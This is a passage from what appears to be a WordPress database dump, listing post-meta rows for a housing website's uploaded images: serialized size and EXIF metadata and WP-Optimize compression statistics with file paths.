\";s:6:\"camera\";s:8:\"SM-G900K\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:2:\"40\";s:13:\"shutter_speed\";s:19:\"0.00067750677506775\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(233,124,'_wp_attached_file','2019/08/Green-Energy.jpg'),(234,124,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:24:\"2019/08/Green-Energy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Green-Energy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Green-Energy-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Green-Energy-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Green-Energy-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:24:\"Green-Energy-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(235,125,'_wp_attached_file','2019/08/roof.jpg'),(236,125,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:16:\"2019/08/roof.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"roof-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"roof-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"roof-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"roof-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:16:\"roof-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon PowerShot G3 X\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:6:\"67.365\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(237,126,'_wp_attached_file','2019/08/young.jpg'),(238,126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:641;s:4:\"file\";s:17:\"2019/08/young.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"young-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"young-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"young-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"young-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:17:\"young-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"DMC-FZ150\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.8\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(239,127,'_wp_attached_file','2019/08/Case-study.jpg'),(240,127,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2019/08/Case-study.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Case-study-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Case-study-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Case-study-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Case-study-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:22:\"Case-study-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(241,128,'_wp_attached_file','2019/08/business-training.jpg'),(242,128,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:567;s:4:\"file\";s:29:\"2019/08/business-training.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"business-training-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"business-training-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"business-training-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"business-training-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:29:\"business-training-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(243,129,'_wp_attached_file','2019/08/renting2.jpg'),(244,129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:20:\"2019/08/renting2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"renting2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"renting2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"renting2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"renting2-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:20:\"renting2-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(245,130,'_wp_attached_file','2019/08/rent.jpg'),(246,130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:16:\"2019/08/rent.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"rent-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"rent-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"rent-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"rent-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:16:\"rent-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(247,131,'_wp_attached_file','2019/08/Therapy.jpg'),(248,131,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:364;s:4:\"file\";s:19:\"2019/08/Therapy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Therapy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Therapy-300x114.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:114;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Therapy-768x291.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Therapy-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:19:\"Therapy-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(249,132,'_wp_attached_file','2019/08/Massages.jpg'),(250,132,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2019/08/Massages.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Massages-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Massages-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Massages-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Massages-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:20:\"Massages-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(251,105,'_thumbnail_id','121'),(255,131,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/Therapy-updraft-pre-smush-original.jpg'),(256,131,'smush-complete','1'),(257,131,'smush-info','The file was compressed from 126.17 KB to 120.35 KB saving 4.62 percent using WP-Optimize'),(258,131,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:129201;s:12:\"smushed-size\";i:123237;s:15:\"savings-percent\";d:4.6200000000000001;}'),(259,132,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/Massages-updraft-pre-smush-original.jpg'),(260,132,'smush-complete','1'),(261,132,'smush-info','The file was compressed from 117.66 KB to 113.62 KB saving 3.43 percent using WP-Optimize'),(262,132,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:120485;s:12:\"smushed-size\";i:116350;s:15:\"savings-percent\";d:3.4300000000000002;}'),(263,130,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/rent-updraft-pre-smush-original.jpg'),(264,130,'smush-complete','1'),(265,130,'smush-info','The file was compressed from 102.08 KB to 94.71 KB saving 7.22 percent using WP-Optimize'),(266,130,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:104532;s:12:\"smushed-size\";i:96980;s:15:\"savings-percent\";d:7.2199999999999998;}'),(267,128,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/business-training-updraft-pre-smush-original.jpg'),(268,128,'smush-complete','1'),(269,128,'smush-info','The file was compressed from 123.50 KB to 117.75 KB saving 4.65 percent using WP-Optimize'),(270,128,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:126464;s:12:\"smushed-size\";i:120578;s:15:\"savings-percent\";d:4.6500000000000004;}'),(271,129,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/renting2-updraft-pre-smush-original.jpg'),(272,129,'smush-complete','1'),(273,129,'smush-info','The file was compressed from 81.39 KB to 76.55 KB saving 5.95 percent using WP-Optimize'),(274,129,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:83348;s:12:\"smushed-size\";i:78391;s:15:\"savings-percent\";d:5.9500000000000002;}'),(275,127,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/Case-study-updraft-pre-smush-original.jpg'),(276,127,'smush-complete','1'),(277,127,'smush-info','The file was compressed from 153.90 KB to 147.24 KB saving 4.33 percent using WP-Optimize'),(278,127,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:157594;s:12:\"smushed-size\";i:150772;s:15:\"savings-percent\";d:4.3300000000000001;}'),(279,126,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/young-updraft-pre-smush-original.jpg'),(280,126,'smush-complete','1'),(281,126,'smush-info','The file was compressed from 251.76 KB to 236.64 KB saving 6.01 percent using WP-Optimize'),(282,126,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:257802;s:12:\"smushed-size\";i:242318;s:15:\"savings-percent\";d:6.0099999999999998;}'),(283,124,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/Green-Energy-updraft-pre-smush-original.jpg'),(284,124,'smush-complete','1'),(285,124,'smush-info','The file was compressed from 84.69 KB to 81.71 KB saving 3.51 percent using WP-Optimize'),(286,124,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:86719;s:12:\"smushed-size\";i:83671;s:15:\"savings-percent\";d:3.5099999999999998;}'),(287,125,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/roof-updraft-pre-smush-original.jpg'),(288,125,'smush-complete','1'),(289,125,'smush-info','The file was compressed from 186.86 KB to 179.60 KB saving 3.89 percent using WP-Optimize'),(290,125,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:191343;s:12:\"smushed-size\";i:183906;s:15:\"savings-percent\";d:3.8900000000000001;}'),(291,123,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/renewable-energy-updraft-pre-smush-original.jpg'),(292,123,'smush-complete','1'),(293,123,'smush-info','The file was compressed from 194.14 KB to 190.75 KB saving 1.75 percent using WP-Optimize'),(294,123,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:198800;s:12:\"smushed-size\";i:195328;s:15:\"savings-percent\";d:1.75;}'),(295,122,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/health2-updraft-pre-smush-original.jpg'),(296,122,'smush-complete','1'),(297,122,'smush-info','The file was compressed from 156.26 KB to 147.22 KB saving 5.79 percent using WP-Optimize'),(298,122,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:160013;s:12:\"smushed-size\";i:150755;s:15:\"savings-percent\";d:5.79;}'),(299,121,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician-updraft-pre-smush-original.jpg'),(300,121,'smush-complete','1'),(301,121,'smush-info','The file was compressed from 163.05 KB to 155.92 KB saving 4.37 percent using WP-Optimize'),(302,121,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:166961;s:12:\"smushed-size\";i:159662;s:15:\"savings-percent\";d:4.3700000000000001;}'),(303,99,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/06/fibre-optic-updraft-pre-smush-original.jpg'),(304,99,'smush-complete','1'),(305,99,'smush-info','The file was compressed from 66.78 KB to 64.15 KB saving 3.93 percent using WP-Optimize'),(306,99,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:68378;s:12:\"smushed-size\";i:65691;s:15:\"savings-percent\";d:3.9300000000000002;}'),(307,96,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/06/fiber-optic-2749588_960_720-updraft-pre-smush-original.jpg'),(308,96,'smush-complete','1'),(309,96,'smush-info','The file was compressed from 199.47 KB to 192.60 KB saving 3.45 percent using WP-Optimize'),(310,96,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:204259;s:12:\"smushed-size\";i:197222;s:15:\"savings-percent\";d:3.4500000000000002;}'),(311,89,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/05/automatic-gates-updraft-pre-smush-original.jpg'),(312,89,'smush-complete','1'),(313,89,'smush-info','The file was compressed from 108.55 KB to 104.43 KB saving 3.8 percent using WP-Optimize'),(314,89,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:111154;s:12:\"smushed-size\";i:106934;s:15:\"savings-percent\";d:3.7999999999999998;}'),(315,80,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers-updraft-pre-smush-original.jpg'),(316,80,'smush-complete','1'),(317,80,'smush-info','The file was compressed from 82.01 KB to 75.59 KB saving 7.83 percent using WP-Optimize'),(318,80,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:83975;s:12:\"smushed-size\";i:77403;s:15:\"savings-percent\";d:7.8300000000000001;}'),(319,81,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/White-Modern-Kitchen-updraft-pre-smush-original.jpg'),(320,81,'smush-complete','1'),(321,81,'smush-info','The file was compressed from 270.65 KB to 132.39 KB saving 51.08 percent using WP-Optimize'),(322,81,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:277146;s:12:\"smushed-size\";i:135566;s:15:\"savings-percent\";d:51.079999999999998;}'),(323,77,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/retro-3249927_960_720-updraft-pre-smush-original.jpg'),(324,77,'smush-complete','1'),(325,77,'smush-info','The file was compressed from 135.76 KB to 131.88 KB saving 2.86 percent using WP-Optimize'),(326,77,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:139021;s:12:\"smushed-size\";i:135050;s:15:\"savings-percent\";d:2.8599999999999999;}'),(327,78,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720-updraft-pre-smush-original.jpg'),(328,78,'smush-complete','1'),(329,78,'smush-info','The file was compressed from 278.05 KB to 262.66 KB saving 5.54 percent using WP-Optimize'),(330,78,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:284724;s:12:\"smushed-size\";i:268964;s:15:\"savings-percent\";d:5.54;}'),(331,74,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/kitchen-2486092_960_720-updraft-pre-smush-original.jpg'),(332,74,'smush-complete','1'),(333,74,'smush-info','The file was compressed from 248.06 KB to 236.26 KB saving 4.76 percent using WP-Optimize'),(334,74,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:254012;s:12:\"smushed-size\";i:241926;s:15:\"savings-percent\";d:4.7599999999999998;}'),(335,73,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/kitchen-2165756_960_720-updraft-pre-smush-original.jpg'),(336,73,'smush-complete','1'),(337,73,'smush-info','The file was compressed from 140.93 KB to 137.88 KB saving 2.17 percent using WP-Optimize'),(338,73,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:144316;s:12:\"smushed-size\";i:141188;s:15:\"savings-percent\";d:2.1699999999999999;}'),(339,72,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/interior-design-2047075_960_720-updraft-pre-smush-original.jpg'),(340,72,'smush-complete','1'),(341,72,'smush-info','The file was compressed from 199.26 KB to 191.56 KB saving 3.86 percent using WP-Optimize'),(342,72,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:204040;s:12:\"smushed-size\";i:196159;s:15:\"savings-percent\";d:3.8599999999999999;}'),(343,71,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1-updraft-pre-smush-original.jpg'),(344,71,'smush-complete','1'),(345,71,'smush-info','The file was compressed from 153.92 KB to 146.98 KB saving 4.5 percent using WP-Optimize'),(346,71,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:157612;s:12:\"smushed-size\";i:150512;s:15:\"savings-percent\";d:4.5;}'),(347,68,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-updraft-pre-smush-original.jpg'),(348,68,'smush-complete','1'),(349,68,'smush-info','The file was compressed from 153.92 KB to 146.98 KB saving 4.5 percent using WP-Optimize'),(350,68,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:157612;s:12:\"smushed-size\";i:150512;s:15:\"savings-percent\";d:4.5;}'),(351,59,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2019/02/household-rubbish-updraft-pre-smush-original.jpg'),(352,59,'smush-complete','1'),(353,59,'smush-info','The file was compressed from 274.44 KB to 258.62 KB saving 5.77 percent using WP-Optimize'),(354,59,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:281030;s:12:\"smushed-size\";i:264823;s:15:\"savings-percent\";d:5.7699999999999996;}'),(355,37,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2018/05/builder-updraft-pre-smush-original.jpg'),(356,37,'smush-complete','1'),(357,37,'smush-info','The file was compressed from 130.39 KB to 124.97 KB saving 4.16 percent using WP-Optimize'),(358,37,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:133523;s:12:\"smushed-size\";i:127972;s:15:\"savings-percent\";d:4.1600000000000001;}'),(359,33,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/cropped-lost-places-updraft-pre-smush-original.jpg'),(360,33,'smush-complete','1'),(361,33,'smush-info','The file was compressed from 124.94 KB to 116.75 KB saving 6.56 percent using WP-Optimize'),(362,33,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:127942;s:12:\"smushed-size\";i:119552;s:15:\"savings-percent\";d:6.5599999999999996;}'),(363,25,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/roof-plate-updraft-pre-smush-original.jpg'),(364,25,'smush-complete','1'),(365,25,'smush-info','The file was compressed from 76.05 KB to 73.17 KB saving 3.79 percent using WP-Optimize'),(366,25,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:77871;s:12:\"smushed-size\";i:74923;s:15:\"savings-percent\";d:3.79;}'),(367,20,'original-file','/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/roofs-updraft-pre-smush-original.jpg'),(368,20,'smush-complete','1'),(369,20,'smush-info','The file was compressed from 349.07 KB to 330.50 KB saving 5.32 percent using 